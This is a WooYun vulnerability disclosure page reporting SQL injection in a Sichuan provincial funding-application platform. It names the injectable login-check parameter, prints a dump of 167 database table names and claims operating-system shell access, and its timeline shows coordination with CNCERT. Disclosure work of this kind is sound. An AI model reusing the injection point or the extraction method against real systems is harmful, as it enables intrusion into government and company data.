当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140650

漏洞标题:四川省省级战略性新兴产业发展专项资金项目申报管理平台存在SQL注入漏洞

相关厂商:四川省经济和信息化委员会

漏洞作者: qglfnt

提交时间:2015-09-17 11:46

修复时间:2015-11-03 19:56

公开时间:2015-11-03 19:56

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-29: 细节向核心白帽子及相关领域专家公开
2015-10-09: 细节向普通白帽子公开
2015-10-19: 细节向实习白帽子公开
2015-11-03: 细节向公众公开

简要描述:

RT

详细说明:

要装silverlight才可浏览
站点:**.**.**.**:8666/SL/slProjectMainPage.aspx

20150912012905.png


20150912012946.jpg


这个系统隶属于四川省经济和信息化委员会

20150912013615.jpg

漏洞证明:

SQL注入:**.**.**.**:8666/SysManage/Login/CheckInstitutional?isCode=
当前库

20150912013057.png


所有库

20150912013139.png



Database: PAMS
[167 tables]
+-------------------------------------------+
| FlowExeAndApply |
| FlowExeAndFundsForFundsPlanDetail |
| FlowExeAndFundsForFundsPlanDetail |
| FlowExeAndFundsForProjectLibrary |
| FlowExeAndFundsPlanDetail |
| FlowExeAndPlanDetail |
| FlowExeAndRun |
| FlowExe_FlowList_Funds_Apply_Company_View |
| FlowNodeDefine_FlowExe_View |
| PAMS_Acceptance_Performance |
| PAMS_Acceptance_Performance |
| PAMS_Acceptance_Product_Performance |
| PAMS_Acceptance_Product_Performance |
| PAMS_Acct_ApplicationPatent |
| PAMS_Acct_AuthorizePatent |
| PAMS_Acct_Breakthrough |
| PAMS_Acct_CompletionSurvey |
| PAMS_Acct_Credit |
| PAMS_Acct_Economic |
| PAMS_Acct_Equipment |
| PAMS_Acct_FutureEconomic |
| PAMS_Acct_NewProducts |
| PAMS_Acct_PlaceUse |
| PAMS_Affairs |
| PAMS_ApplyCategory_IndustryCategory |
| PAMS_ApplyCategory_IndustryCategory |
| PAMS_ApplyCategory_ProjectCategory |
| PAMS_ApplyHistory |
| PAMS_Apply_DevHistory |
| PAMS_Apply_DevHistory |
| PAMS_Apply_DevHistory |
| PAMS_Apply_EquipmentHistory |
| PAMS_Apply_EquipmentHistory |
| PAMS_Apply_KeyTechHistory |
| PAMS_Apply_KeyTechHistory |
| PAMS_Apply_MaterialHistory |
| PAMS_Apply_MaterialHistory |
| PAMS_Apply_NewProductHistory |
| PAMS_Apply_NewProductHistory |
| PAMS_Apply_ProjectTask |
| PAMS_Apply_RightsHistory |
| PAMS_Apply_RightsHistory |
| PAMS_Apply_SaleHistory |
| PAMS_Apply_SaleHistory |
| PAMS_Apply_ServicesHistory |
| PAMS_Apply_ServicesHistory |
| PAMS_Apply_TechSourceHistory |
| PAMS_Apply_TechSourceHistory |
| PAMS_ApproveEntry |
| PAMS_ApproveEntry |
| PAMS_ApproveIdea |
| PAMS_BBS_Question |
| PAMS_BBS_Reply |
| PAMS_CODE_AffairsType |
| PAMS_CODE_ApplyFunds |
| PAMS_CODE_BankCreditRating |
| PAMS_CODE_CategoryCompanyCompany |
| PAMS_CODE_CompanyEconomicBenefit |
| PAMS_CODE_CompanyProducts |
| PAMS_CODE_CompanyPropertyE |
| PAMS_CODE_CompanyPropertyE |
| PAMS_CODE_Company_CP |
| PAMS_CODE_Company_CP |
| PAMS_CODE_ConstructionArea |
| PAMS_CODE_DevOrgType |
| PAMS_CODE_DocList |
| PAMS_CODE_Employee |
| PAMS_CODE_ExpertType |
| PAMS_CODE_IndustryCategory |
| PAMS_CODE_IndustryCategory |
| PAMS_CODE_IndustryParkClass |
| PAMS_CODE_InfoType |
| PAMS_CODE_Module |
| PAMS_CODE_OwnShipType |
| PAMS_CODE_PlanType |
| PAMS_CODE_ProjectCategory |
| PAMS_CompanyApproveIDea |
| PAMS_CompanyList |
| PAMS_CurrLoginList |
| PAMS_DepartmentOrFormHistory |
| PAMS_DepartmentOrFormHistory |
| PAMS_EconomicBenefitHistory |
| PAMS_EconomicBenefitHistory |
| PAMS_Emp_Industry |
| PAMS_ExpertOrFundsHistory |
| PAMS_ExpertOrFundsHistory |
| PAMS_ExpertsMaintenance |
| PAMS_FlowBaseNode |
| PAMS_FlowBaseNode |
| PAMS_FlowCompanyMap |
| PAMS_FlowCompanyMap |
| PAMS_FlowConfigDetail |
| PAMS_FlowConfigDetail |
| PAMS_FlowDefine |
| PAMS_FlowExe |
| PAMS_FlowList |
| PAMS_FlowNodeDefine |
| PAMS_FlowNodeMap |
| PAMS_FlowStatus |
| PAMS_FundsHistory |
| PAMS_FundsPlanDetail |
| PAMS_FundsPlanDetail |
| PAMS_FundsProjectLibrary |
| PAMS_FundsRightHistory |
| PAMS_FundsRightHistory |
| PAMS_Funds_FundInfoHistory |
| PAMS_Funds_FundInfoHistory |
| PAMS_Funds_FundInfoHistory |
| PAMS_Funds_HistoryNewProduct |
| PAMS_Funds_NewProduct |
| PAMS_Funds_UsersPlannedHistory |
| PAMS_Funds_UsersPlannedHistory |
| PAMS_IndustryAlliance_Company |
| PAMS_IndustryAlliance_Company |
| PAMS_IndustryPark |
| PAMS_InfoAttachmentHistory |
| PAMS_InfoAttachmentHistory |
| PAMS_InfoAttachmentHistory |
| PAMS_Log_Export |
| PAMS_MODULE_DateTime |
| PAMS_OperateLog |
| PAMS_PlanDetailHistory |
| PAMS_PlanDetailHistory |
| PAMS_PlanDetailHistory |
| PAMS_PlanHistory |
| PAMS_ProductsHistory |
| PAMS_ProductsHistory |
| PAMS_ProjectConstructionStatus |
| PAMS_Run_ConStructionProgress |
| PAMS_Run_Money |
| PAMS_Run_PPC |
| PAMS_Run_ProjectPhase |
| PAMS_Run_ProjectSchedule |
| PAMS_Run_Questions |
| PAMS_SMS |
| PAMS_Statements |
| PAMS_SysAffairs |
| PAMS_Table_Columns |
| PAMS_Table_Config |
| PAMS_Table_Control |
| PAMS_UserDataRight |
| PAMS_UserLoginLogDetail |
| PAMS_UserLoginLogDetail |
| PAMS_ViewPlan |
| RatingsTable |
| SMSHistoryInfo |
| SMSQueue |
| UpdatePassWordQueue |
| VFundsAttachmentList |
| VFundsPlanFlow |
| ViewDepartmentOrFunds |
| ViewFlowExeAndFlowWork |
| ViewFlowExeAndFlowWork |
| ViewFlowExeAndFundsPlan |
| ViewFlowExeAndFundsPlan |
| ViewFlowWork |
| ViewFundsPlanDetail |
| View_ExpertAndFunds |
| View_FundsPlanList |
| View_Funds_FlowStutas |
| View_ProjectSchedule_Flow |
| View_QiFundsStatus |
| View_Run_PS1 |
| View_Run_PS1 |
| View_app_funds_company |
| company_view |
| sysdiagrams |
+-------------------------------------------+


os-shell

20150912013326.png

修复方案:

过滤。。。

版权声明:转载请注明来源 qglfnt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-19 19:55

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论